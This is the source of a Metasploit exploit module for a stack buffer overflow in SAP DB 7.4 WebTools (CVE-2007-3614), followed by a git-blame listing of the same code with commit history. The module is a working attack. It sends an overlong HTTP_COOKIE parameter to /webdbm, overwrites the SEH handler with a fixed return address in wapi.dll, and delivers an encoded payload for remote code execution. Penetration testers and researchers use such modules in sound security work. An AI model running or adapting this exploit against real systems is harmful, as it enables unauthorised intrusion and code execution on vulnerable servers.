modules/exploits/windows/http/sapdb_webtools.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SAP DB 7.4 WebTools Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.
          By sending an overly long GET request, it may be possible for
          an attacker to execute arbitrary code.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-3614' ],
          [ 'OSVDB', '37838' ],
          [ 'BID', '24773' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 850,
          'BadChars' => "\x00",
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
                        {
                          'BufferRegister' => 'ECX',
                        },
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0
        ],
        'DisclosureDate' => '2007-07-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(9999) ])
  end

  def exploit
    filler = rand_text_alphanumeric(20774)
    seh = generate_seh_payload(target.ret)

    sploit = filler + seh + rand_text_alphanumeric(3000)

    print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)

    res = send_request_raw(
      {
        'uri' => '/webdbm',
        'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
      }, 5
    )

    handler
  end
end
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00
add more http fingerprints, thx mc 2010-07-14 00:02:21 +00:00			`HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] }`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::Seh`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'SAP DB 7.4 WebTools Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`By sending an overly long GET request, it may be possible for`
			`an attacker to execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' => [`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`[ 'CVE', '2007-3614' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '37838' ],`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`[ 'BID', '24773' ],`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => true,`
			`'DefaultOptions' => {`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`'EXITFUNC' => 'thread',`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 850,`
updated due to reliability. all payloads work now. 2010-07-13 22:38:44 +00:00			`'BadChars' => "\x00",`
			`'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
updated due to reliability. all payloads work now. 2010-07-13 22:38:44 +00:00			`'EncoderOptions' =>`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`{`
			`'BufferRegister' => 'ECX',`
			`},`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DisclosureDate' => '2007-07-05',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`register_options([ Opt::RPORT(9999) ])`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`end`

			`def exploit`
			`filler = rand_text_alphanumeric(20774)`
			`seh = generate_seh_payload(target.ret)`
style compliance fixes 2010-07-16 02:33:25 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`sploit = filler + seh + rand_text_alphanumeric(3000)`

			`print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
style compliance fixes 2010-07-16 02:33:25 +00:00			`res = send_request_raw(`
			`{`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => '/webdbm',`
style compliance fixes 2010-07-16 02:33:25 +00:00			`'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`}, 5`
			`)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`handler`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`